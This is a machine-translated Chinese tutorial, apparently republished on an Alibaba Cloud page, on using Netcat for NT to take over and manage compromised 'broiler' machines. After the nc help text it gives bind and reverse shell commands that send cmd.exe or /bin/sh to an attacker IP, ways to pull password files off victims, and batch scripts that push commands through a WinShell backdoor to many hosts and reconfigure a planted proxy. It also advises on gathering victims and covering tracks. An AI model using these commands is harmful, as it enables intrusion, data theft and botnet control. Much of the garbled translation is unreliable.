0. Written in front of the words
1. Netcat 1.10 for Nt-nc11nt.zip, original English information
2. Netcat 1.10 for NT Help information
3. Netcat 1.10 Common Command format
4. Manage Broiler, change broiler settings
5. Download connection
6. PostScript
######################################################################
0. Written in front of the words
######################################################################
Recently work more idle, always thinking about how to automatically telnet broiler, automatically execute commands. To manage their own chickens.
Write a program yourself. The foundation is not enough, so only look at the NC Help information, although only read a half understand,
But with the help of PowerWord 2002 version, still understand a little thing.
I think it is necessary to sum up. Anyway, mainly to meet my own needs.
######################################################################
1. Netcat 1.10 for Nt-nc11nt.zip
######################################################################
Basic Features
* Outbound or inbound connections, TCP or UDP, to or from any ports
* Full DNS Forward/reverse checking with appropriate warnings
* Ability to with any local source port
* Ability to use any locally-configured network source address
* Built-in port-scanning capabilities, with Randomizer
* Can Read command line arguments from standard InputB
* Slow-send mode, one line every N seconds
* Hex dump of transmitted and received data
* Ability to let another program service established
Connections
* Telnet-options Responder
New for NT
* Ability to run in the background without a console window
* Ability to restart as a single-threaded server to handle a new
Connection
________________________________________________________________________
Some of the features of Netcat are:
Outbound or inbound connections, TCP or UDP, to or from any ports
Full DNS forward/reverse checking with appropriate warnings
Ability to with any local source port
Ability to the any locally-configured network source address
Built-in port-scanning capabilities, with Randomizer
Built-in loose source-routing capability
Can Read command line arguments from standard input
Slow-send mode, one line every N seconds
Optional ability to let another program service inbound connections
Some of the potential uses of Netcat:
Script backends
Scanning ports and inventorying services
Backup handlers
File transfers
Server Testing and Simulation
Firewall Testing
Proxy gatewaying
Network Performance Testing
Address spoofing Tests
Protecting X Servers
1001 Other uses you'll likely come up with
Netcat + encryption = Cryptcat
Compared to Win2000 Microsoft's Telnet.exe and Microsoft's Tlntsvr.exe services, the connection can be seen.
1.1 NC. EXE is a non-standard Telnet client program,
1.2 There is also a Putty.exe client program that provides four modes of connectivity
-raw-telnet-rlogin-ssh.
######################################################################
2. Netcat 1.10 for NT Help information
######################################################################
C:\windows\desktop>nc-h
[v1.10 NT]
Connect to SOMEWHERE:NC [-options] hostname port[s] [ports] ...
Listen for inbound:nc-l-P port [options] [hostname] [port]
Options
-D detach from console, background mode (background)
-E Prog inbound program to exec [dangerous!!]
-G Gateway source-routing Hop Point[s], up to 8
-G num source-routing pointer:4, 8, 12, ...
-H This cruft (Help information)
-I secs delay interval for lines sent, ports scanned (delay time)
-L Listen mode, for inbound connects (listening mode, waiting for connection)
-L listen harder, re-listen on the socket close (after the connection is closed, still listening)
-N numeric-only IP addresses, no DNS (IP digital mode, non-DNS resolution)
-o file hex dump of traffic (hexadecimal mode output file, three segments)
-P port Local port number
-R randomize Local and remote ports (random remote port)
-S addr Local Source Address
-T Answer TELNET negotiation
-U UDP mode
-v VERBOSE [twice to is more verbose] (-VV for more information)
-W secs timeout for connects and final net reads
-Z zero-i/o mode [used for scanning] (scan mode,-VV)
Port numbers can be individual or ranges:m-n [inclusive]
######################################################################
3. Netcat 1.10 Common Command format
######################################################################
Here's a quote from the article "Sleep Awake October 15 Morning".
3.1. The port of spying:
NC-VV IP Port
RIVER [192.168.0.198] 19190 (?) Open//show whether Open
3.2. Scanning device
NC-VV-W 5 IP Port-port Port
Nc-vv-z IP port-port Port
This scan leaves a lot of traces, and the system administrator will be extra careful
3.3. Back door
Victim Machine://Victim's machine
Nc-l-P port-e cmd.exe//win2000
Nc-l-P port-e/bin/sh//unix,linux
Attacker machine://Attacker's machine.
NC ip-p Port//connection victim_ip, and then get a shell.
3.4. Reverse Connection
Attacker machine://generally sql2.exe, remote overflow, webdavx3.exe attack.
Or a WOLLF reverse connection.
Nc-vv-l-P Port
Victim Machine:
NC-E cmd.exe attacker Ip-p Port
NC-E/bin/sh attacker Ip-p Port
139 to add parameter-s (Nc.exe-l-P 139-d-e cmd.exe-s the other machine IP)
This will ensure that Nc.exe takes precedence over NetBIOS.
3.5. Transfer of documents:
3.5.1 attacker machine <--victim machine//From the broiler drag password file back.
nc-d-l-p Port < path\filedest/*attacker machine*/can shell execute
NC-VV attacker_ip port > Path\File.txt/*victim machine*/need CTRL + C to exit
Chicken needs GUI interface cmd.exe inside execution (terminal Landing, not as easy as installing FTP). Otherwise there is no way to enter the Crl+c.
3.5.2 Attacker Machine--> victim//upload command file to Broiler
Nc-vv-l-P port > Path\File.txt/*victim machine*/requires CTRL + C exit
nc-d victim_ip Port < path\filedest/*attacker machine*/can shell execute
This is better. We landed at the terminal and invaded other chickens. You can choose Shell mode to log in.
Conclusion: Ascii,bin files can be transmitted. You can transfer program files.
Problem: After connecting an IP, the transfer completes, need to send Ctrl + C exit Nc.exe.
Or you can only reconnect using Pskill.exe to kill the process. But do you want to release the handle to open the transfer file?
3.6-Port data grabbing package.
Nc-vv-w 2-o test.txt www.xfocus.net 80 21-15
3.7 Telnet, automatic batch processing. ★★★★★ This is what I want to focus on recommending.
NC victim_ip Port < path\file.cmd/*victim machine*/displays the execution process.
NC-VV victim_ip Port < path\file.cmd/*victim machine*/displays the execution process.
nc-d victim_ip Port < path\file.cmd quiet mode.
_______________file.cmd________________________
Password
CD%windir%
echo []=[%windir%]
C:
CD \
MD Test
CD/D%windir%\system32\
net stop Sksockserver
Snake.exe-config Port 11111
net start Sksockserver
Exit
_______________file.cmd__end___________________
######################################################################
4. Manage Broiler, change broiler settings
######################################################################
4.1 For example, to change the proxy port above the broiler. Snake.exe modified to 11111 service name "Sksockserver"
Use the WinShell back door. Port 1234 Password Password
The command format is
Modi.bat Youip.txt
___________modi.bat____________________________
@if "%1" = "" Echo error:no ip.txt &&goto End
: Auto
@for/F "eol=; tokens=1,2 "%%i in (% 1) do @ (nc.exe-vv-w 3%%i 1234 < A.cmd)
: End
___________modi.bat__end_______________________
4.2
@echo off
Color F0
: Start
Cls
C:\nc-vv-w 3-l-P 80>>80.txt
Goto Start
When you turn off the firewall and run this batch, you'll hear a lot of information about detecting u vulnerabilities, mostly
It's a group of three--NIMDA virus scans your. This will get the broiler. Although the quality is not high.
But it's also a cheap way to do it.
Broiler Features:
1. Unicode vulnerability
2. Guest password is blank, Administrators group user
3. Other vulnerabilities
Take your time and enjoy yourself. However, once again, it is not recommended and can not damage the domestic mainframe, go up later will Tftp.exe renamed. Then use PsKill to kill mmc.exe process, after is antivirus. After the back door, the guest account is deactivated to deal with the idiot scanner
The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion;
products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the
content of the page makes you feel confusing, please write us an email, we will handle the problem
within 5 days after receiving your email.
If you find any instances of plagiarism from the community, please send an email to:
info-contact@alibabacloud.com
and provide relevant evidence. A staff member will contact you within 5 working days.
